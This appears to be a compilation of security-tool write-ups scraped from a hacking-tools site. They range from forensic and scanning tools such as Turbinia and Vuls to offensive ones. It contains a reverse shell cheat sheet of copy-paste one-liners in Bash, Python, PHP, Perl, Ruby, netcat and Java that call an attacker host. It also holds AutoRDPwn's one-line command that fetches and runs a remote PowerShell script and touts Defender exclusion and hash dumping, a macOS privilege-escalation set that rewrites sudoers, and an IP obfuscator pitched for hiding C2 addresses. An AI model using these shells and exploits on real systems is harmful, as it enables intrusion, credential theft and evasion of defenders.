
Cuteit v0.2.1 - IP Obfuscator Made To Make A Malicious Ip A Bit Cuter


IP obfuscator made to make a malicious IP a bit cuter.
A simple Python tool to help you social engineer, bypass whitelisting firewalls, potentially break regex rules for command-line logging that look for IP addresses, and obfuscate cleartext strings to C2 locations within the payload.
All of this is done simply by obfuscating the IP into many alternative forms.
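As a rough illustration of the idea (this is not Cuteit's own code), the same IPv4 address can be written in several equivalent notations that most URL parsers still resolve to the same host; a minimal Python sketch:

# Minimal sketch (not part of Cuteit): equivalent notations for one IPv4 address.
import socket
import struct

ip = "192.168.0.5"
packed = struct.unpack(">I", socket.inet_aton(ip))[0]   # IP as a 32-bit integer

dword = str(packed)                                      # e.g. http://3232235525
hexed = "0x{:08x}".format(packed)                        # e.g. http://0xc0a80005
octal = ".".join("0{:o}".format(int(o)) for o in ip.split("."))  # e.g. http://0300.0250.00.05

print(dword, hexed, octal)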

Usage
usage: Cuteit.py [-h] [--disable-coloring] ip

positional arguments:
ip IP you want to convert

optional arguments:
-h, --help show this help message and exit
--disable-coloring Disable colored printing

Screenshot



Using it as a module!
You can use this script as a module in your python scripts as follows:
import Cuteit
convert = Cuteit.lib(ip)
print(convert.hex)
and the photo below shows that in action:




UserLAnd - The Easiest Way To Run A Linux Distribution or Application on Android


The easiest way to run a Linux distribution or application on Android.
Features:
  • Run full Linux distros or specific applications on top of Android.
  • Install and uninstall like a regular app.
  • No root required.

Start using UserLAnd
There are two ways to use UserLAnd: single-click apps and user-defined custom sessions.

Using single-click apps:

  1. Click an app.
  2. Fill out the required information.
  3. You're good to go!

Using user-defined custom sessions:

  1. Define a session - This describes what filesystem you are going to use, and what kind of service you want to use when connecting to it (ssh or vnc).
  2. Define a filesystem - This describes what distribution of Linux you want to install.
  3. Once defined, just tap on the session to start it up. This will download the necessary assets, set up the filesystem, start the server, and connect to it. This will take several minutes for the first startup, but will be quicker afterwards.

Managing Packages

Debian, Ubuntu, And Kali:
-> Update: sudo apt-get update && sudo apt-get dist-upgrade
-> Install Packages: sudo apt-get install <package name>
-> Remove Packages: sudo apt-get remove <package name>
Archlinux:
-> Update: sudo pacman -Syu
-> Install Packages: sudo pacman -S <package name>
-> Remove Packages: sudo pacman -R <package name>

Installing A Desktop

Debian, Ubuntu, And Kali:
-> Install Lxde: sudo apt-get install lxde (default desktop)
-> Install X Server Client: Download on the Play store
-> Launch XSDL
-> In UserLAnd Type: export DISPLAY=:0 PULSE_SERVER=tcp:127.0.0.1:<PORT NUMBER>
-> Then Type: startlxde
-> Then Go Back To XSDL And The Desktop Will Show Up
ArchLinux:
-> Install Lxde: sudo pacman -S lxde
-> Install X Server Client: Download on the Play store
-> Launch XSDL
-> In UserLAnd Type: export DISPLAY=:0 PULSE_SERVER=tcp:127.0.0.1:<PORT NUMBER>
-> Then Type: startlxde
-> Then Go Back To XSDL And The Desktop Will Show Up


But you can do so much more than that. Your phone isn't just a plaything anymore!
 
Have a bug report or a feature request?
You can see the templates by visiting the issue center.
You can also chat on slack.

Want to contribute?
See CONTRIBUTING document.


Reload.sh - Reinstall, Restore And Wipe Your System Via SSH, Without Rebooting


Reinstall, restore, and wipe your system from within, and in place of, the running GNU/Linux distribution (no CD-ROM, flash drive, or other media required). Via SSH, without rebooting.



How does it work?
Set your archive with system backup to restore:
_build="/mnt/system-backup.tgz"
Set path to temporary system (optional):
_base="/mnt/minimal-base"
If you do not specify this parameter, the temporary system will be downloaded automatically.
Set path to main system disk:
_disk="/dev/vda"
Run reload.sh:
./bin/reload.sh --base "$_base" --build "$_build" --disk "$_disk"
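Putting the steps together, a minimal sketch of a full invocation (using the example values from above) could be:
#!/bin/sh
# Sketch only: restore the backup archive onto /dev/vda using a local temporary system.
_build="/mnt/system-backup.tgz"
_base="/mnt/minimal-base"
_disk="/dev/vda"

./bin/reload.sh --base "$_base" --build "$_build" --disk "$_disk"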

Contributions
Suggestions and pull requests are welcome. See also this.

See also


Legion - An Easy-To-Use, Super-Extensible And Semi-Automated Network Penetration Testing Tool That Aids In Discovery, Reconnaissance And Exploitation Of Information Systems


Legion, a fork of SECFORCE's Sparta, is an open source, easy-to-use, super-extensible and semi-automated network penetration testing framework that aids in discovery, reconnaissance and exploitation of information systems. Legion is developed and maintained by GoVanguard. More information about Legion, including the product roadmap, can be found on its product page at https://GoVanguard.io/legion.

FEATURES
  • Automatic recon and scanning with NMAP, whatweb, nikto, Vulners, Hydra, SMBenum, dirbuster, sslyze, webslayer and more (with almost 100 auto-scheduled scripts)
  • Easy to use graphical interface with rich context menus and panels that allow pentesters to quickly find and exploit attack vectors on hosts
  • Modular functionality allows users to easily customize Legion and automatically call their own scripts/tools
  • Highly customizable stage scanning for ninja-like IPS evasion
  • Automatic detection of CPEs (Common Platform Enumeration) and CVEs (Common Vulnerabilities and Exposures)
  • Realtime autosaving of project results and tasks

NOTABLE CHANGES FROM SPARTA
  • Refactored from Python 2.7 to Python 3.6 and eliminated deprecated and unmaintained libraries
  • Upgraded to PyQt5 for a more responsive, less buggy, and more intuitive GUI that includes features like:
    • Task completion estimates
    • 1-click scanning of lists of IPs, hostnames and CIDR subnets
    • Ability to purge results, rescan hosts and delete hosts
    • Granular nmap scanning options
  • Support for hostname resolution and scanning of vhosts/SNI hosts
  • Revised process queuing and execution routines for increased app reliability and performance
  • Simplified installation with dependency resolution and installation routines
  • Realtime project autosaving, so in the event something goes wrong you will not lose any progress!
  • Docker container deployment option
  • Supported by a highly active development team

GIF DEMO


INSTALLATION

TRADITIONAL METHOD
Assumes Ubuntu, Kali or Parrot Linux is being used with Python 3.6 installed. Other dependencies should automatically be installed. Within Terminal:
git clone https://github.com/GoVanguard/legion.git
cd legion
sudo chmod +x startLegion.sh
sudo ./startLegion.sh

DOCKER METHOD
Assumes Docker and Xauthority are installed. Within Terminal:
git clone https://github.com/GoVanguard/legion.git
cd legion/docker
sudo chmod +x runIt.sh
sudo ./runIt.sh

ATTRIBUTION
  • Refactored Python 3.6+ codebase, added feature set and ongoing development of Legion is credited to GoVanguard
  • The initial Sparta Python 2.7 codebase and application design is credited to SECFORCE.
  • Several additional PortActions, PortTerminalActions and SchedulerSettings are credited to batmancrew.
  • The nmap XML output parsing engine was largely based on code by yunshu, modified by ketchup and by SECFORCE.
  • ms08-067_check script used by smbenum.sh is credited to Bernardo Damele A.G.
  • Legion relies heavily on nmap, hydra, python, PyQt, SQLAlchemy and many other tools and technologies so we would like to thank all of the people involved in the creation of those.


Ghidra - Software Reverse Engineering Framework


Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, Mac OS, and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. Ghidra supports a wide variety of process instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.
In support of NSA's Cybersecurity mission, Ghidra was built to solve scaling and teaming problems on complex SRE efforts, and to provide a customizable and extensible SRE research platform. NSA has applied Ghidra SRE capabilities to a variety of problems that involve analyzing malicious code and generating deep insights for SRE analysts who seek a better understanding of potential vulnerabilities in networks and systems.
This repository is a placeholder for the full open source release. Be assured efforts are under way to make the software available here. In the meantime, enjoy using Ghidra on your SRE efforts, developing your own scripts and plugins, and perusing the over a million lines of Java and Sleigh code released within the initial public release. The release can be downloaded from our project homepage.

Demo



Turbinia - Automation And Scaling Of Digital Forensics Tools


Turbinia is an open-source framework for deploying, managing, and running distributed forensic workloads. It is intended to automate the running of common forensic processing tools (e.g. Plaso, TSK, strings) to help with processing evidence in the Cloud, scaling the processing of large amounts of evidence, and decreasing response time by parallelizing processing where possible.

How it works
Turbinia is composed of different components for the client, server and the workers. These components can be run in the Cloud, on local machines, or as a hybrid of both. The Turbinia client makes requests to process evidence to the Turbinia server. The Turbinia server creates logical jobs from these incoming user requests, which creates and schedules forensic processing tasks to be run by the workers. The evidence to be processed will be split up by the jobs when possible, and many tasks can be created in order to process the evidence in parallel. One or more workers run continuously to process tasks from the server. Any new evidence created or discovered by the tasks will be fed back into Turbinia for further processing.
Communication from the client to the server is currently done with either Google Cloud PubSub or Kombu messaging. The worker implementation can use either PSQ (a Google Cloud PubSub Task Queue) or Celery for task scheduling.
More information on Turbinia and how it works can be found here.

Status
Turbinia is currently in Alpha release.

Installation
There is a rough installation guide here.

Usage
The basic steps to get things running after the initial installation and configuration are:
  • Start Turbinia server component with turbiniactl server command
  • Start one or more Turbinia workers with turbiniactl psqworker
  • Send evidence to be processed from the turbinia client with turbiniactl ${evidencetype}
  • Check status of running tasks with turbiniactl status
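A compact sketch of that sequence (the evidence path is illustrative; each long-running command normally goes in its own terminal):
turbiniactl server                       # start the Turbinia server
turbiniactl psqworker                    # start a worker (use celeryworker when running Celery)
turbiniactl rawdisk -l /path/to/disk.dd  # submit a raw disk image as evidence
turbiniactl status                       # check the status of running tasks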
turbiniactl can be used to start the different components, and here is the basic usage:
$ turbiniactl --help
usage: turbiniactl [-h] [-q] [-v] [-d] [-a] [-f] [-o OUTPUT_DIR] [-L LOG_FILE]
[-r REQUEST_ID] [-R] [-S] [-C] [-V] [-D]
[-F FILTER_PATTERNS_FILE] [-j JOBS_WHITELIST]
[-J JOBS_BLACKLIST] [-p POLL_INTERVAL] [-t TASK] [-w]
<command> ...

optional arguments:
-h, --help show this help message and exit
-q, --quiet Show minimal output
-v, --verbose Show verbose output
-d, --debug Show debug output
-a, --all_fields Show all task status fields in output
-f, --force_evidence Force evidence processing request in potentially
unsafe conditions
-o OUTPUT_DIR, --output_dir OUTPUT_DIR
Directory path for output
-L LOG_FILE, --log_file LOG_FILE
Log file
-r REQUEST_ID, --request_id REQUEST_ID
Create new requests with this Request ID
-R, --run_local Run completely locally without any server or other
infrastructure. This can be used to run one-off Tasks
to process data locally.
-S, --server Run Turbinia Server indefinitely
-C, --use_celery Pass this flag when using Celery/Kombu for task
queuing and messaging (instead of Google PSQ/pubsub)
-V, --version Show the version
-D, --dump_json Dump JSON output of Turbinia Request instead of
sending it
-F FILTER_PATTERNS_FILE, --filter_patterns_file FILTER_PATTERNS_FILE
A file containing newline separated string patterns to
filter text based evidence files with (in extended
grep regex format). This filtered output will be in
addition to the complete output
-j JOBS_WHITELIST, --jobs_whitelist JOBS_WHITELIST
A whitelist for Jobs that we will allow to run (note
that it will not force them to run).
-J JOBS_BLACKLIST, --jobs_blacklist JOBS_BLACKLIST
A blacklist for Jobs we will not allow to run
-p POLL_INTERVAL, --poll_interval POLL_INTERVAL
Number of seconds to wait between polling for task
state info
-t TASK, --task TASK The name of a single Task to run locally (must be used
with --run_local).
-w, --wait Wait to exit until all tasks for the given request
have completed

Commands:
<command>
rawdisk Process RawDisk as Evidence
googleclouddisk Process Google Cloud Persistent Disk as Evidence
googleclouddiskembedded
Process Google Cloud Persistent Disk with an embedded
raw disk image as Evidence
directory Process a directory as Evidence
listjobs List all available jobs
psqworker Run PSQ worker
celeryworker Run Celery worker
status Get Turbinia Task status
server Run Turbinia Server
The commands for processing the evidence types of rawdisk and directory specify information about evidence that Turbinia should process. By default, when adding new evidence to be processed, turbiniactl will act as a client and send a request to the configured Turbinia server, otherwise if --server is specified, it will start up its own Turbinia server process. Here's the turbiniactl usage for adding a raw disk type of evidence to be processed by Turbinia:
$ ./turbiniactl rawdisk -h
usage: turbiniactl rawdisk [-h] -l LOCAL_PATH [-s SOURCE] [-n NAME]

optional arguments:
-h, --help show this help message and exit
-l LOCAL_PATH, --local_path LOCAL_PATH
Local path to the evidence
-s SOURCE, --source SOURCE
Description of the source of the evidence
-n NAME, --name NAME Descriptive name of the evidence
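For example, submitting a raw disk image with an optional source description and name (the values here are illustrative) might look like:
$ turbiniactl rawdisk -l /evidence/suspect-laptop.dd -s "Seized laptop" -n suspect-laptop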

Other documentation

Notes
  • Turbinia currently assumes that Evidence is equally available to all worker nodes (e.g. through locally mapped storage, or through attachable persistent Google Cloud Disks, etc).
  • Not all evidence types are supported yet
  • Still only a small number of processing job types supported, but more are being developed.

Obligatory Fine Print
This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google.


Chomp Scan - A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase


A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.

Scope
Chomp Scan is a Bash script that chains together the fastest and most effective tools (in my opinion/experience) for doing the long and sometimes tedious process of recon. No more looking for word lists and trying to remember when you started a scan and where the output is. Chomp Scan creates a timestamped output directory based on the search domain, e.g. example.com-21:38:15, and puts all tool output there, split into individual sub-directories as appropriate. Custom output directories are also supported via the -o flag.
New: Chomp Scan now integrates Notica, which allows you to receive a notification when the script finishes. Simply visit Notica and get a unique URL parameter, pass the parameter to Chomp Scan via the -n flag, keep the Notica page open in a browser tab on your computer or phone, and you will receive a message when Chomp Scan has finished running. No more constantly checking/forgetting to check those long-running scans.
Chomp Scan runs in multiple modes. The primary one is using command-line arguments to select which scanning phases to use, which wordlists, etc. A guided interactive mode is available, as well as a non-interactive mode, useful if you do not want to deal with setting multiple arguments.
A list of interesting words is included, such as dev, test, uat, staging, etc., and domains containing those terms are flagged. This way you can focus on the interesting domains first if you wish. This list can be customized to suit your own needs, or replaced with a different file via the -X flag.
A blacklist file is included, to exclude certain domains from the results. However it does not prevent those domains from being resolved, only from being used for port scanning and content discovery. It can be passed via the -b flag.
Chomp Scan supports limited canceling/skipping of tools by pressing Ctrl-c. This can sometimes have unintended side effects, so use with care.
Note: Chomp Scan is in active development, and new/different tools will be added as I come across them. Pull requests and comments welcome!

Scanning Phases

Subdomain Discovery (3 different sized wordlists)
  • dnscan
  • subfinder
  • sublist3r
  • massdns + altdns

Screenshots (optional)
  • aquatone

Port Scanning (optional)

Information Gathering (optional) (4 different sized wordlists)
  • subjack
  • bfac
  • whatweb
  • wafw00f
  • nikto

Content Discovery (optional) (4 different sized wordlists)
  • ffuf
  • gobuster
  • dirsearch

Wordlists
A variety of wordlists are used, both for subdomain bruteforcing and content discovery. Daniel Miessler's Seclists are used heavily, as well as Jason Haddix's lists. Different wordlists can be used by passing in a custom wordlist or using one of the built-in named argument lists below.

Subdomain Bruteforcing
Argument Name | Filename | Word Count | Description
short | subdomains-top1mil-20000.txt | 22k | From Seclists
long | sortedcombined-knock-dnsrecon-fierce-reconng.txt | 102k | From Seclists
huge | huge-200k.txt | 199k | Combination I made of various wordlists, including Seclists

Content Discovery
Argument Name | Filename | Word Count | Description
small | big.txt | 20k | From Seclists
medium | raft-large-combined.txt | 167k | Combination of the raft wordlists in Seclists
large | seclists-combined.txt | 215k | Larger combination of all the Discovery/DNS lists in Seclists
xl | haddix_content_discovery_all.txt | 373k | Jason Haddix's all content discovery list
xxl | haddix-seclists-combined.txt | 486k | Combination of the two previous lists

Misc.
  • altdns-words.txt - 240 words - Used for creating domain permutations for massdns to resolve. Borrowed from altdns.
  • interesting.txt - 43 words - A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.

Installation
Clone this repo and run the installer.sh script. Make sure to source ~/.profile after running the installer in order to add the Go binary path to your $PATH variable. Then run Chomp Scan.

Usage
Chomp Scan always runs subdomain enumeration, thus a domain is required via the -u flag. The domain should not contain a scheme, e.g. http:// or https://. By default, HTTPS is always used. This can be changed to HTTP by passing the -H flag. A wordlist is optional, and if one is not provided the built-in short list (22k words) is used.
Other scan phases are optional. Content discovery can take an optional wordlist, otherwise it defaults to the built-in small (20k words) list.
The final results of the scan are stored in two text files in the output directory. All unique domains that are found are stored in all_discovered_domains.txt, and all unique IPs that are discovered are stored in all_discovered_ips.txt.
chomp-scan.sh -u example.com -a -d short -cC large -p -o path/to/directory

Usage of Chomp Scan:
-u domain
(required) Domain name to scan. This should not include a scheme, e.g. https:// or http://.
-d wordlist
(optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge can be used, as well as the path to a custom wordlist. The default is short.
-c
(optional) Enable content discovery phase. The wordlist for this option defaults to small if not provided.
-C wordlist
(optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl can be used, as well as the path to a custom wordlist. The default is small.
-s
(optional) Enable screenshots using Aquatone.
-i
(optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto.
-p
(optional) Enable portscanning phase, using masscan (run as root) and nmap.
-I
(optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D.
-D
(optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I.
Options: Subdomain enumeration wordlist: short.
Content discovery wordlist: small.
Aquatone screenshots: yes.
Portscanning: yes.
Information gathering: yes.
Domains to scan: all unique discovered.
-b wordlist
(optional) Set custom domain blacklist file.
-X wordlist
(optional) Set custom interesting word list.
-o directory
(optional) Set custom output directory. It must exist and be writable.
-a
(optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A.
-A
(optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a.
-H
(optional) Use HTTP for connecting to sites instead of HTTPS.
-h
(optional) Display this help page.
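For instance, a fully non-interactive run using the defaults listed under -D (the domain is illustrative) would be:
chomp-scan.sh -u example.com -D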

In The Future
Chomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I'm considering:
  • Adding a config file, for more granular customization of tools and parameters
  • Adding testing/support for Ubuntu/Debian
  • A possible Python re-write (and maybe a Go re-write after that!)
  • The generation of an HTML report, similar to what aquatone provides

Examples








Goca Scanner - FOCA fork written in Go


Goca is a FOCA fork written in Go; it is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages, and can be downloaded and analyzed with Goca.
It is capable of analyzing a wide variety of documents, with the most common being Microsoft Office, Open Office, or PDF files, although it also analyzes Adobe InDesign or SVG files, for instance.

These documents are searched for using search engines such as:
  • Google
  • Bing
  • DuckDuckGo
  • Yahoo
  • Ask
Goca then downloads the documents and extracts the EXIF information from graphic files; a complete analysis of the information discovered through the URL is conducted even before downloading the file.

USAGE
Download built packages from Releases
To build from source, you will need Go installed.
$ export GO111MODULE=on 
$ go get ./...
$ go run goca/goca.go -h
To run Goca from Docker:
$ docker build -t gocaio/goca /path/to/goca
$ docker run gocaio/goca -h

Contributing Guide
Please read the Contributing guide:

Documentation
Refer to the Official Doc.



Cat-Nip - Automated Basic Pentest Tool (Designed For Kali Linux)


Cat-Nip Automated Basic Pentest Tool

This tool automates your basic pentesting tasks, such as information gathering, auditing, and reporting, so every task is performed fully automatically.

Usage Guide
Download / Clone Cat-Nip
~# git clone https://github.com/baguswiratmaadi/catnip
Go Inside Cat-Nip Dir
~# cd catnip
Give Permission To Cat-Nip
~# chmod 777 catnip.sh
Run Cat-Nip
~# ./catnip.sh

Changelog
  • 1.0 First Release

Pentest Tools Auto Executed With Cat-Nip
  • Whois Lookup
  • DNSmap
  • Nmap
  • Dmitry
  • Theharvester
  • Load Balancing Detector
  • SSLyze
  • Automater
  • Ua Tester
  • Gobuster
  • Grabber
  • Parsero
  • Uniscan
  • And more tools soon

Screenshot
This is a preview of Cat-Nip:

Tools Preview



Output Result



Report In HTML




Disclaimer
  • Do not scan government or private IT assets without legal permission.
  • Use at your own risk.

AutoRDPwn v4.8 - The Shadow Attack Framework


AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view the victim's desktop without their consent, and even control it on demand. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
Powershell 4.0 or higher

Changes

Version 4.8
• Compatibility with Powershell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PSexec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.
One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits and Acknowledgments
Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net


rootOS - macOS Root Helper


Tries to use various CVEs to gain sudo or root access. All exploits have an end goal of adding ALL ALL=(ALL) NOPASSWD: ALL to /etc/sudoers allowing any user to run sudo commands.
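After a successful run, the new rule can be confirmed (and removed once testing is done) by inspecting the sudoers file, for example:
sudo grep -n "NOPASSWD: ALL" /etc/sudoers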

Exploits
  • CVE-2008-2830
  • CVE-2015-3760
  • CVE-2015-5889
  • CVE-2017-13872
  • AppleScript Dynamic Phishing
  • Sudo Piggyback Link

Run
python root.py


Vuls - Vulnerability Scanner For Linux/FreeBSD, Agentless, Written In Go


Vulnerability scanner for Linux/FreeBSD, agentless, written in golang.
Twitter: @vuls_en




DEMO


Abstract
For a system administrator, having to perform security vulnerability analysis and software updates on a daily basis can be a burden. To avoid downtime in a production environment, it is common for system administrators to choose not to use the automatic update option provided by the package manager and to perform updates manually. This leads to the following problems.
  • System administrators will have to constantly watch out for any new vulnerabilities in the NVD (National Vulnerability Database) or similar databases.
  • It might be impossible for the system administrator to monitor all the software if there is a large number of software packages installed on the server.
  • It is expensive to perform an analysis to determine the servers affected by new vulnerabilities. The possibility of overlooking a server or two during analysis is there.
Vuls is a tool created to solve the problems listed above. It has the following characteristics.
  • Informs users of the vulnerabilities that are related to the system.
  • Informs users of the servers that are affected.
  • Vulnerability detection is done automatically to prevent any oversight.
  • Reports are generated on a regular basis using cron or other methods, to help manage vulnerabilities.

Main Features

Scan for any vulnerabilities in Linux/FreeBSD Server
Supports major Linux/FreeBSD
  • Alpine, Ubuntu, Debian, CentOS, Amazon Linux, RHEL, Oracle Linux, SUSE Enterprise Linux and Raspbian, FreeBSD
  • Cloud, on-premise, Docker

High quality scan
Vuls uses Multiple vulnerability databases

Fast scan and Deep scan
Fast Scan
  • Scan without root privilege, no dependencies
  • Almost no load on the scan target server
  • Offline mode scan with no internet access. (Red Hat, CentOS, OracleLinux, Ubuntu, Debian)
Fast Root Scan
  • Scan with root privilege
  • Almost no load on the scan target server
  • Detect processes affected by updates using yum-ps (RedHat, CentOS, Oracle Linux and Amazon Linux)
  • Detect processes which have been updated but not yet restarted, using checkrestart from debian-goodies (Debian and Ubuntu)
  • Offline mode scan with no internet access. (RedHat, CentOS, OracleLinux, Ubuntu, Debian)
Deep Scan
  • Scan with root privilege
  • Parses the Changelog
    Changelog has a history of version changes. When a security issue is fixed, the relevant CVE ID is listed. By parsing the changelog and analysing the updates between the installed version of software on the server and the newest version of that software it's possible to create a list of all vulnerabilities that need to be fixed.
  • Sometimes load on the scan target server

Remote scan and Local scan
Remote Scan
  • The user is required to set up only one machine that is connected to the other target servers via SSH
Local Scan
  • If you don't want the central Vuls server to connect to each server by SSH, you can use Vuls in the Local Scan mode.

Dynamic Analysis
  • It is possible to acquire the state of the server by connecting via SSH and executing commands.
  • Vuls warns when the scan target server has had its kernel etc. updated but has not been restarted yet.

Scan middleware that are not included in OS package management
  • Scan middleware, programming language libraries and frameworks for vulnerabilities
  • Support software registered in CPE

MISC
  • Nondestructive testing
  • Pre-authorization is NOT necessary before scanning on AWS
    • Vuls works well with Continuous Integration since tests can be run every day. This allows you to find vulnerabilities very quickly.
  • Auto generation of configuration file template
    • Auto detection of servers set using CIDR, generate configuration file template
  • Email and Slack notification is possible (supports Japanese language)
  • Scan result is viewable on accessory software, TUI Viewer on terminal or Web UI (VulsRepo).

What Vuls Doesn't Do

Authors
kotakanbe (@kotakanbe) created vuls and these fine people have contributed.

Change Log
Please see CHANGELOG.


Reverse Shell Cheat Sheet


If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute “cmd.exe” for “/bin/sh -i”.
Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.
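Each example assumes the attacking machine (192.168.0.5 in these snippets) already has a listener waiting on the chosen port; a plain netcat listener is enough:
nc -lvnp 4444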

Php :
php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :
bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :
nc -e /bin/sh 192.168.0.5 4444

Perl :
perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :
ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :
xterm -display 192.168.0.5:4444


Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler


Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.

Getting Started
Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing
You can install Kage binaries from here.

For developers
To run the app from source code:
# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build
electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

Screenshots






Video Tutorial


Contact
Twitter: @iFalah
Email: ifalah@protonmail.com

Credits
Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/
node-msfrpcd - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc
electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue

This project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.


Acunetix Web Application Vulnerability Report 2019


Acunetix compiles an annual web application vulnerability report. The purpose of this report is to provide security experts and interested parties with an analysis of data on vulnerabilities gathered over the previous year. The 2019 report contains the results and analysis of vulnerabilities detected from automated web and network perimeter scans run on the Acunetix Online platform over a 12-month period, across more than 10,000 scan targets. It was found that as many as 46% of websites contain high severity vulnerabilities, with 87% of websites containing medium severity vulnerabilities. Although SQL Injection vulnerabilities are on a slight decline, XSS vulnerabilities, vulnerable JavaScript libraries, and WordPress related issues were each found to affect a significant 30% of the sampled targets.

The Web Application Vulnerability Report 2019 contains vital security information on:
  • Which vulnerabilities are rising and falling in frequency
  • Current security concerns, such as the increasing complexity of new apps, the accelerating rate of new versions, and the problem of scale
  • Changes in threat landscape from both the client and server sides
  • The four major stages of vulnerability analysis
  • Vulnerability findings by type and severity
  • An analysis of each discovered vulnerability in terms of how it works, its statistical status and pointers for remediation.
The report concludes that web application vulnerabilities are a major threat to the security of all organizations, regardless of their size, location, or the security steps they’ve taken. Automated and integrated web application security scanning must become an integral part of the development process.






IoT-Home-Guard - A Tool For Malicious Behavior Detection In IoT Devices

IoT-Home-Guard is a project to help people discover malware in smart home devices.
For users, the project can help detect compromised smart home devices. For security researchers, it is also useful for network analysis and malicious behavior detection.
In July 2018 we completed the first version. We will complete the second version by October 2018, with an improved user experience and an increased number of identifiable devices.
The first generation is a hardware device based on a Raspberry Pi with wireless network interface controllers. We will customize new hardware in the second generation. The system can also be set up in software on a laptop after essential environment configuration. The software part is available in software_tools/.

Proof of principle
Our approach is based on the detection of malicious network traffic. A device implanted with malware will communicate with a remote server, trigger a remote shell, or send audio/video to the server.
The chart below shows the network traffic of a device implanted with snooping malware.
Red line: traffic between devices and a remote spy server.
Green line: normal traffic of devices.
Black line: sum of TCP traffic.


Modules
  1. AP module and data flow catcher: catch network traffic.
  2. Traffic analyzing engine: extract characteristics from network traffic and compare them with the device fingerprint database.
